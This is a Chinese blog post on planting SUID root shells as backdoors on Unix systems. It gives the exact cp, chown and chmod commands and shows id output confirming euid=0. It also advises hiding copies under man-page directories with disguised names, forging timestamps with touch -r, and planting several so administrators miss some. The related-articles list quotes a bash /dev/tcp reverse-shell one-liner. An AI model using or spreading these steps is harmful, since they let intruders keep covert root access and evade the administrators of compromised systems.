suid shell

最新推荐文章于 2023-02-26 23:02:45 发布
最新推荐文章于 2023-02-26 23:02:45 发布
阅读量1k 收藏
点赞数
分类专栏: 运维管理 文章标签: shell oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/linkboy2004/article/details/1731766
版权
在 /tmp 或者其他的目录下放置 suid shell。以后只要你运行这个,就会轻易得到根用户权限。
  
  #cp /bin/ksh /tmp/.sh
  
  #chown root:root /tmp/.sh
  
  #chmod +s /tmp/.sh
  
  当你运行/tmp/.sh时,
  
  这里我们用ksh shell是因为ksh 可以suid.换成其他的shell也许可能不行,具体看各个主机的情况而定.一般我们使用ksh.我们使用的溢出用来获得root权限的,也一般是溢出后执行/bin/ksh.
  
  $id
  
  uid=1002(oracle) gid=1(other)
  
  $/tmp/.sh
  
  #
  
  #id
  
  uid=1002(oracle) gid=1(other) euid=0(root) egid=0(root)
  
  我们又是root了.
  
  当然,为了更加隐蔽,我们不能把suid shell 放在/tmp
  
  因为它是很容易被发现的.
  
  我们应该放在深层的目录里面.
  
  比如:
  
  /usr/X11/include/X11/
  
  或者
  
  /usr/lib/
  
  等等
  
  通常我做的是:
  
  # mkdir /usr/lib/lib/ mkdir /usr/lib/lib/...
  
  # cp /bin/ksh /usr/lib/lib/.../lib
  
  # chown root:sys /usr/lib/lib/.../lib
  
  # chmod 4555 /usr/lib/lib/.../lib
  
  # touch -r /bin/ksh /usr/lib/lib/.../lib
  
  一个简单的suid shell安放好了.
  
  不过,大家不要学我,我们要放在最隐蔽的地方.我新建目录的隐藏效果不是最好的.
  
  我们必须利用现有的目录来安放,并且这个目录要有很多其它的文件做掩护.
  
  大家不防试试/usr/man/下的目录.
  
  很少管理员会检查这里的.
  
  比如:
  
  /usr/man/man1/
  
  /usr/man/manl/
  
  等.
  
  比如:
  
  # cp /bin/ksh /usr/man/man1/ja.1
  
  :)当然具体要看你自己琢磨一下了.我敢说不难,最好多放置几个suid shell 在不同的目录.这样即使管理员发现了一个,也还有另外一个.:)
 
linkboy2004
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
什么是Suid shell
不用此栏
06-09 1141
Suid shell是一种可用于以拥有者权限运行的shell。也就是说,如果拥有者是root,那你就可能以root的身份执行命令。普通的shell文件属性为rwxr-xr-x,拥有者为root,root可读/写/执行这个shell,而其他用户则只能以自己的权限读和运行它。然而,如果有一个文件属性为rwsr-xr-x的shell,就可以获得文件拥有者权限;如果文件拥有者是root,那么任何运行了这个
什么是Suid Shell
teresa502的专栏
06-04 811
Suid shell是一种可用于以拥有者权限运行的shell。也就是说,如果拥有者<br /> 是root,那你就可能以root的 <br /> 身份执行命令。普通的shell文件属性为rwxr-xr-x,拥有者为root,root可读/写<br /> /执行这个shell,而其他用户 <br /> 则只能以自己的权限读和运行它。然而,如果有一个文件属性为rwsr-xr-x的she<br /> ll,就可以获得文件拥有者权 <br /> 限;如果文件拥有者是root,那么任何运行了这个s
【内网安全】——Linux权限维持
最新发布
Demo不是emo的博客
02-26 4561
Linux常见的权限维持姿势
【安全研究】Linux后渗透常见后门驻留方式分析
weixin_49128886的博客
11-09 1397
Linux后渗透常见后门驻留方式分析
Linux利用Suid提权实验
qq_45813384的博客
02-20 1058
普通用户在执行特殊的Suid命令的时候(如:find、vim、less、more等),命令会自动申请管理员权限,并以管理员的权限去执行命令,当用户在这种拥有可以再执行命令的命令下(如:vim)执行特殊命令(如:!find 当前目录下的文件 -execbash-i >& /dev/tcp/192.168.0.105/8529 0>&1。bash-i >& /dev/tcp/192.168.0.105/2323 0>&1//反弹shell命令。ln-s-fbash /bin/sh //修改成bash。
Shell编程指南
09-15
- `-r`, `-w`, `-x`, `-u`, `-g`, `-k`, `-s` 用于测试文件权限和特殊属性(SUID, SGID, Sticky bit)。 7. **文件比较**: - `-nt`, `-ot` 检查文件的新旧关系。 - `-ef` 判断两个文件是否指向同一 inode,即...
shell编程笔记
08-06
典型的文件是 /usr/bin/passwd,该文件设置了 SUID 权限,普通用户可以执行该文件来修改自己的密码。 在 shell 编程中,理解文件和目录的权限是非常重要的,因为它关系到系统的安全性和稳定性。同时,学习 shell ...
shell编程指南
02-20
Linux Shell编程指南是为希望掌握Linux环境下Shell脚本编程的读者所编写的指南。Shell是Linux和UNIX操作系统上的命令行解释器,负责接收用户的输入并调用相应的程序执行。Shell脚本就是一系列命令的集合,可以被...
LINUX与UNIX Shell
12-13
同时,也介绍了目录、suid/guid的概念、chown和chgrp命令来修改文件所有者或用户组,以及如何使用umask来设定新创建文件和目录的默认权限。 文件名置换部分讲解了如何使用通配符*、?和[]等在Shell中进行文件名匹配...
Linux shell脚本编程
05-02
suid/guid指的是文件或目录的所有者或所属组,例如“suidshell”和“guidshell”指的是具有特殊权限的shell程序。 2. chown和chgrp命令 chown命令用于更改文件或目录的所有者,如“chown -R username:groupname ...
Linux中suid提权
qq_41123867的博客
03-18 2196
一、原理: 设置了SUID的文件可以让调用者以文件属主的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了 SUID详解 二、已知可用来提权的linux文件: nmap vim find bash more less nano cp 三、提权过程 1. 查看当前用户权限 在获得一个shell后,我们可以...
Linux配置不当提权-suid提权
孤的博客
09-14 1651
攻击成功,并得到一个shell,但是这里却只是一个简单的shell,首先需要把它转换为一个交互式的shell 在简单shell中直接按删除键是不行的,要按住ctrl键之后,再按住删除键才可以,其他键的使用也一样 命令 python -c 'import pty;pty.spawn("/bin/bash")' 现在已经进入了一个交互的shell了,但是可以看到这只是一个普通的用户,所以我们要把他提...
关于suid/guid
codetest1234的博客
11-22 267
设置文件权限位时我们一般忽略了suid/guid的存在,现在看看它们到底是怎么回事。[@more@]suid/guid是什么? suid意味着如果A用户对属于他自己的shell脚本文件设置了这种权限,那么其他用户在执行这个脚本的...
SUID Shell脚本的危险
心猿问道的博客
08-02 670
Dangers of SUID Shell Scripts This article attempts to walk the fine line between full disclosure and published exploits. The object of this article is to illustrate how SUID programs work in order t...
靶机渗透测试实战(一)——拿下shell之后的操作、SUID的解释
weixin_45116657的博客
09-25 2950
理论基础: 1、使用arp-scan -l命令进行主机扫描,确定主机ip; arp-scan是一个用来进来系统发现和指纹识别的命令行工具。它可以构建并发送ARP请求到指定的IP地址,并且显示返回的任何响应。 arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR、地址范围或者列表文件的方式指定。该工具...
Linux学习---文件特殊权限(SUID)
车前猛跑
08-26 6134
SetUID的功能 1.    只有可执行的二进制程序或者shell程序才能设定SUID权限 2.    命令执行者要对该程序(命令)拥有x(执行)权限 3.    命令执行者在执行该程序时获得该程序文件owner的身份(在执行程序的过程中灵魂附体为文件的owner) 4.    SetUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效   以passwd命令举
SUID权限测试
Z_xiao_feng的博客
05-20 524
SUID权限测试 1)将mkdir命令复制为/bin/mymd1,添加SUID 2)以用户zhangsan登入,做下列测试:在其家目录下分别使用mkdir、mymd1命令尝试创建snew01、snew02 3)查看snew01、snew02权限及归属关系 SUID是Linux特殊权限的一种,能够用来传递可执行程序所有者的身份及具备所有者的权限。 注意事项:只针对可执行程序文件、可执行程序所有者必须...
基于Snort的入侵检测系统 3
02-11 2578
 第三章使用Snort规则如同病毒,大多数入侵行为都具有某种特征,Snort的规则就是用这些特征的有关信息构建的。在第1章中我们提到,你可以用蜜罐来取得入侵者所用的工具和技术的信息,以及他们都做了什么。此外,还有入侵者会利用的已知的系统弱点数据库,如果入侵者试图利用这些弱点来实施攻击,也可以作为一些特征。这些特征可能出现在包的头部,也可能在数据载荷中。Snort的检测系统是基于规则的,而规
关于用sarg统计流量的不完全使用方法
03-31 2116
sarg可以统计squid代理用户的流量、使用时间、访问网站记录等信息。简单说一下使用方法,可以在web.onda.com.br/orso/下载我用的是sarg-1.2.2.tar.gz,squid安装在/usr/local/squid$cp sarg-1.2.2.tar.gz /tmp$cd /tmp$tar zxvf sarg-1.2.2.tar.gz$cd sarg-1.2.2$./conf
Shell编程精华要点解析
"Shell编程摘录" Shell编程是Linux/Unix操作系统中的一种脚本语言,它允许用户通过命令行界面来编写自动化任务。以下是一些关键的Shell编程知识点: 1. **文件的权限位**:在Linux/Unix系统中,每个文件都有一个9...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值